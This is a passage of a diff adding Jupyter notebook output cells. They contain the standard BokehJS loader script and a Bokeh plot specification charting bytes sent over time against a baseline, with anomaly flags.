+       "      this.keyboard_manager.register_events(toinsert);\n",
+       "      // Render to node\n",
+       "      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n",
+       "      render(props, toinsert[toinsert.length - 1]);\n",
+       "      element.append(toinsert);\n",
+       "      return toinsert\n",
+       "    }\n",
+       "\n",
+       "    /* Handle when an output is cleared or removed */\n",
+       "    events.on('clear_output.CodeCell', handleClearOutput);\n",
+       "    events.on('delete.Cell', handleClearOutput);\n",
+       "\n",
+       "    /* Handle when a new output is added */\n",
+       "    events.on('output_added.OutputArea', handleAddOutput);\n",
+       "\n",
+       "    /**\n",
+       "     * Register the mime type and append_mime function with output_area\n",
+       "     */\n",
+       "    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n",
+       "      /* Is output safe? */\n",
+       "      safe: true,\n",
+       "      /* Index of renderer in `output_area.display_order` */\n",
+       "      index: 0\n",
+       "    });\n",
+       "  }\n",
+       "\n",
+       "  // register the mime type if in Jupyter Notebook environment and previously unregistered\n",
+       "  if (root.Jupyter !== undefined) {\n",
+       "    var events = require('base/js/events');\n",
+       "    var OutputArea = require('notebook/js/outputarea').OutputArea;\n",
+       "\n",
+       "    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n",
+       "      register_renderer(events, OutputArea);\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  \n",
+       "  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n",
+       "    root._bokeh_timeout = Date.now() + 5000;\n",
+       "    root._bokeh_failed_load = false;\n",
+       "  }\n",
+       "\n",
+       "  var NB_LOAD_WARNING = {'data': {'text/html':\n",
+       "     \"<div style='background-color: #fdd'>\\n\"+\n",
+       "     \"<p>\\n\"+\n",
+       "     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n",
+       "     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n",
+       "     \"</p>\\n\"+\n",
+       "     \"<ul>\\n\"+\n",
+       "     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n",
+       "     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n",
+       "     \"</ul>\\n\"+\n",
+       "     \"<code>\\n\"+\n",
+       "     \"from bokeh.resources import INLINE\\n\"+\n",
+       "     \"output_notebook(resources=INLINE)\\n\"+\n",
+       "     \"</code>\\n\"+\n",
+       "     \"</div>\"}};\n",
+       "\n",
+       "  function display_loaded() {\n",
+       "    var el = document.getElementById(\"1001\");\n",
+       "    if (el != null) {\n",
+       "      el.textContent = \"BokehJS is loading...\";\n",
+       "    }\n",
+       "    if (root.Bokeh !== undefined) {\n",
+       "      if (el != null) {\n",
+       "        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n",
+       "      }\n",
+       "    } else if (Date.now() < root._bokeh_timeout) {\n",
+       "      setTimeout(display_loaded, 100)\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "\n",
+       "  function run_callbacks() {\n",
+       "    try {\n",
+       "      root._bokeh_onload_callbacks.forEach(function(callback) {\n",
+       "        if (callback != null)\n",
+       "          callback();\n",
+       "      });\n",
+       "    } finally {\n",
+       "      delete root._bokeh_onload_callbacks\n",
+       "    }\n",
+       "    console.debug(\"Bokeh: all callbacks have finished\");\n",
+       "  }\n",
+       "\n",
+       "  function load_libs(css_urls, js_urls, callback) {\n",
+       "    if (css_urls == null) css_urls = [];\n",
+       "    if (js_urls == null) js_urls = [];\n",
+       "\n",
+       "    root._bokeh_onload_callbacks.push(callback);\n",
+       "    if (root._bokeh_is_loading > 0) {\n",
+       "      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n",
+       "      return null;\n",
+       "    }\n",
+       "    if (js_urls == null || js_urls.length === 0) {\n",
+       "      run_callbacks();\n",
+       "      return null;\n",
+       "    }\n",
+       "    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n",
+       "    root._bokeh_is_loading = css_urls.length + js_urls.length;\n",
+       "\n",
+       "    function on_load() {\n",
+       "      root._bokeh_is_loading--;\n",
+       "      if (root._bokeh_is_loading === 0) {\n",
+       "        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n",
+       "        run_callbacks()\n",
+       "      }\n",
+       "    }\n",
+       "\n",
+       "    function on_error() {\n",
+       "      console.error(\"failed to load \" + url);\n",
+       "    }\n",
+       "\n",
+       "    for (var i = 0; i < css_urls.length; i++) {\n",
+       "      var url = css_urls[i];\n",
+       "      const element = document.createElement(\"link\");\n",
+       "      element.onload = on_load;\n",
+       "      element.onerror = on_error;\n",
+       "      element.rel = \"stylesheet\";\n",
+       "      element.type = \"text/css\";\n",
+       "      element.href = url;\n",
+       "      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n",
+       "      document.body.appendChild(element);\n",
+       "    }\n",
+       "\n",
+       "    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.1.1.min.js\": \"kLr4fYcqcSpbuI95brIH3vnnYCquzzSxHPU6XGQCIkQRGJwhg0StNbj1eegrHs12\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.1.1.min.js\": \"xIGPmVtaOm+z0BqfSOMn4lOR6ciex448GIKG4eE61LsAvmGj48XcMQZtKcE/UXZe\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.1.1.min.js\": \"Dc9u1wF/0zApGIWoBbH77iWEHtdmkuYWG839Uzmv8y8yBLXebjO9ZnERsde5Ln/P\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.1.1.min.js\": \"cT9JaBz7GiRXdENrJLZNSC6eMNF3nh3fa5fTF51Svp+ukxPdwcU5kGXGPBgDCa2j\"};\n",
+       "\n",
+       "    for (var i = 0; i < js_urls.length; i++) {\n",
+       "      var url = js_urls[i];\n",
+       "      var element = document.createElement('script');\n",
+       "      element.onload = on_load;\n",
+       "      element.onerror = on_error;\n",
+       "      element.async = false;\n",
+       "      element.src = url;\n",
+       "      if (url in hashes) {\n",
+       "        element.crossOrigin = \"anonymous\";\n",
+       "        element.integrity = \"sha384-\" + hashes[url];\n",
+       "      }\n",
+       "      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n",
+       "      document.head.appendChild(element);\n",
+       "    }\n",
+       "  };\n",
+       "\n",
+       "  function inject_raw_css(css) {\n",
+       "    const element = document.createElement(\"style\");\n",
+       "    element.appendChild(document.createTextNode(css));\n",
+       "    document.body.appendChild(element);\n",
+       "  }\n",
+       "\n",
+       "  \n",
+       "  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.1.1.min.js\"];\n",
+       "  var css_urls = [];\n",
+       "  \n",
+       "\n",
+       "  var inline_js = [\n",
+       "    function(Bokeh) {\n",
+       "      Bokeh.set_log_level(\"info\");\n",
+       "    },\n",
+       "    function(Bokeh) {\n",
+       "    \n",
+       "    \n",
+       "    }\n",
+       "  ];\n",
+       "\n",
+       "  function run_inline_js() {\n",
+       "    \n",
+       "    if (root.Bokeh !== undefined || force === true) {\n",
+       "      \n",
+       "    for (var i = 0; i < inline_js.length; i++) {\n",
+       "      inline_js[i].call(root, root.Bokeh);\n",
+       "    }\n",
+       "    if (force === true) {\n",
+       "        display_loaded();\n",
+       "      }} else if (Date.now() < root._bokeh_timeout) {\n",
+       "      setTimeout(run_inline_js, 100);\n",
+       "    } else if (!root._bokeh_failed_load) {\n",
+       "      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n",
+       "      root._bokeh_failed_load = true;\n",
+       "    } else if (force !== true) {\n",
+       "      var cell = $(document.getElementById(\"1001\")).parents('.cell').data().cell;\n",
+       "      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n",
+       "    }\n",
+       "\n",
+       "  }\n",
+       "\n",
+       "  if (root._bokeh_is_loading === 0) {\n",
+       "    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n",
+       "    run_inline_js();\n",
+       "  } else {\n",
+       "    load_libs(css_urls, js_urls, function() {\n",
+       "      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n",
+       "      run_inline_js();\n",
+       "    });\n",
+       "  }\n",
+       "}(window));"
+      ],
+      "application/vnd.bokehjs_load.v0+json": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  \n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"1001\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error() {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (var i = 0; i < css_urls.length; i++) {\n      var url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.1.1.min.js\": \"kLr4fYcqcSpbuI95brIH3vnnYCquzzSxHPU6XGQCIkQRGJwhg0StNbj1eegrHs12\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.1.1.min.js\": \"xIGPmVtaOm+z0BqfSOMn4lOR6ciex448GIKG4eE61LsAvmGj48XcMQZtKcE/UXZe\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.1.1.min.js\": \"Dc9u1wF/0zApGIWoBbH77iWEHtdmkuYWG839Uzmv8y8yBLXebjO9ZnERsde5Ln/P\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.1.1.min.js\": \"cT9JaBz7GiRXdENrJLZNSC6eMNF3nh3fa5fTF51Svp+ukxPdwcU5kGXGPBgDCa2j\"};\n\n    for (var i = 0; i < js_urls.length; i++) {\n      var url = js_urls[i];\n      var element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.1.1.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"1001\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"9cd24875-61f0-40fb-8163-512ce9d45266\" data-root-id=\"1146\"></div>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "(function(root) {\n",
+       "  function embed_document(root) {\n",
+       "    \n",
+       "  var docs_json = {\"a5274443-dbc3-4b3b-bb2d-024b4f91b8b1\":{\"roots\":{\"references\":[{\"attributes\":{\"children\":[{\"id\":\"1004\"},{\"id\":\"1116\"}]},\"id\":\"1146\",\"type\":\"Column\"},{\"attributes\":{\"label\":{\"value\":\"observed\"},\"renderers\":[{\"id\":\"1043\"}]},\"id\":\"1064\",\"type\":\"LegendItem\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"1058\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"1059\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#1f77b4\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"navy\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"TotalBytesSent\"}},\"id\":\"1042\",\"type\":\"Circle\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"1061\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"source\":{\"id\":\"1002\"}},\"id\":\"1044\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"1062\",\"type\":\"YearsTicker\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"1060\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"align\":\"right\",\"text\":\"Drag the middle or edges of the selection box to change the range in the main chart\",\"text_font_size\":{\"value\":\"10px\"}},\"id\":\"1132\",\"type\":\"Title\"},{\"attributes\":{\"text\":\"Range Selector\"},\"id\":\"1117\",\"type\":\"Title\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"1133\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"top_units\":\"screen\"},\"id\":\"1028\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"num_minor_ticks\":5,\"tickers\":[{\"id\":\"1172\"},{\"id\":\"1173\"},{\"id\":\"1174\"},{\"id\":\"1175\"},{\"id\":\"1176\"},{\"id\":\"1177\"},{\"id\":\"1178\"},{\"id\":\"1179\"},{\"id\":\"1180\"},{\"id\":\"1181\"},{\"id\":\"1182\"},{\"id\":\"1183\"}]},\"id\":\"1128\",\"type\":\"DatetimeTicker\"},{\"attributes\":{},\"id\":\"1121\",\"type\":\"DataRange1d\"},{\"attributes\":{\"active_drag\":\"auto\",\"active_inspect\":\"auto\",\"active_multi\":{\"id\":\"1141\"},\"active_scroll\":\"auto\",\"active_tap\":\"auto\",\"tools\":[{\"id\":\"1141\"}]},\"id\":\"1131\",\"type\":\"Toolbar\"},{\"attributes\":{\"formatter\":{\"id\":\"1133\"},\"ticker\":{\"id\":\"1128\"}},\"id\":\"1127\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"end\":1594684980000.0,\"start\":1593903420000.0},\"id\":\"1119\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"1123\",\"type\":\"LinearScale\"},{\"attributes\":{\"axis\":{\"id\":\"1127\"},\"ticker\":null},\"id\":\"1130\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"1013\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"1125\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"1171\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"1023\",\"type\":\"WheelZoomTool\"},{\"attributes\":{\"data_source\":{\"id\":\"1002\"},\"glyph\":{\"id\":\"1041\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1042\"},\"selection_glyph\":null,\"view\":{\"id\":\"1044\"}},\"id\":\"1043\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"click_policy\":\"hide\",\"items\":[{\"id\":\"1064\"},{\"id\":\"1088\"},{\"id\":\"1115\"}],\"location\":\"top_left\"},\"id\":\"1063\",\"type\":\"Legend\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"1027\",\"type\":\"PanTool\"},{\"attributes\":{},\"id\":\"1170\",\"type\":\"Selection\"},{\"attributes\":{\"data_source\":{\"id\":\"1002\"},\"glyph\":{\"id\":\"1066\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1067\"},\"selection_glyph\":null,\"view\":{\"id\":\"1069\"}},\"id\":\"1068\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"data_source\":{\"id\":\"1135\"},\"glyph\":{\"id\":\"1137\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1138\"},\"selection_glyph\":null,\"view\":{\"id\":\"1140\"}},\"id\":\"1139\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"label\":{\"value\":\"baseline\"},\"renderers\":[{\"id\":\"1068\"}]},\"id\":\"1088\",\"type\":\"LegendItem\"},{\"attributes\":{\"line_color\":\"green\",\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"baseline\"}},\"id\":\"1066\",\"type\":\"Line\"},{\"attributes\":{\"source\":{\"id\":\"1002\"}},\"id\":\"1069\",\"type\":\"CDSView\"},{\"attributes\":{\"line_alpha\":0.1,\"line_color\":\"green\",\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"baseline\"}},\"id\":\"1067\",\"type\":\"Line\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.2},\"fill_color\":{\"value\":\"firebrick\"},\"line_color\":{\"value\":\"firebrick\"},\"size\":{\"units\":\"screen\",\"value\":12},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"TotalBytesSent\"}},\"id\":\"1091\",\"type\":\"CircleX\"},{\"attributes\":{\"data\":{\"TimeGenerated\":{\"__ndarray__\":\"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\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[272]},\"TotalBytesSent\":[10823,14821,13532,11947,11193,13257,13375,27975,31501,28775,31398,32979,32241,33539,28420,25757,30947,27803,29637,29670,11563,13465,13587,14967,12964,13858,13119,13907,12739,11227,11268,31322,26683,32982,32544,31414,28254,29893,31290,28334,26328,26448,30576,30793,10484,14995,11715,11296,10487,10789,14758,10998,10682,14572,13689,34167,27286,33955,33700,26810,30679,31533,33739,32815,26046,27499,33974,29118,12821,12836,13819,14877,14220,10053,14690,13161,14334,12806,11771,25544,27355,33777,27055,27816,32648,25686,32147,33363,28923,31547,33575,26369,14754,10415,10286,12086,11414,14915,14479,14063,13211,12485,14759,26964,31469,26214,33556,32596,25150,31064,25338,25714,26089,25673,48616,45856,48616,48616,11654,13127,45856,45856,12184,12184,12184,14179,14179,14179,13841,13841,13841,11097,11097,11097,13724,13724,13724,10535,10535,10535,10022,10022,10022,12570,12570,12570,14145,14145,14145,18473,18473,18473,19477,19477,19477,19080,19080,19080,17622,17622,17622,18725,18725,18725,17612,17612,17612,19733,19733,19733,19338,19338,19338,18656,18656,18656,17732,17732,17732,17801,17801,17801,16167,16167,16167,16485,16485,16485,11455,11455,11455,10545,10545,10545,13991,13991,13991,10699,10699,10699,12735,12735,12735,12639,12639,12639,14501,14501,14501,12477,12477,12477,11497,11497,11497,10081,10081,10081,11729,11729,11729,18121,18121,18121,17458,17458,17458,18104,18104,18104,16508,16508,16508,17814,17814,17814,16494,16494,16494,17588,17588,17588,18545,18545,18545,19534,19534,19534,16085,16085,16085,15276,15276,15276,15363,15363,15363,18166,18166,18166,13830,13830,13830,13350,13350,13350,11842,11842,11842,11111,11111,11111],\"anomalies\":[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],\"baseline\":[9967,12647,13282,12099,11149,12505,12297,30814,29694,31830,32863,32600,32113,33448,31404,28388,29977,28356,29786,29685,7980,11082,13632,14117,11757,13268,14037,12675,11993,12896,12619,30037,28712,31414,31605,30466,30321,30846,30213,28168,27766,27151,30910,29311,11623,13393,12318,13180,13020,13701,13999,12782,12513,13122,13077,29286,28219,31319,31208,29568,29567,29720,30294,29225,27243,27396,33549,30638,17104,17565,12112,13147,15434,153